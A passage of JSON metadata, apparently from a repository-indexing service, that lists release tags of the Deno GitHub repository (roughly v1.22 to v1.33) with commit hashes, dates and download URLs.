33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9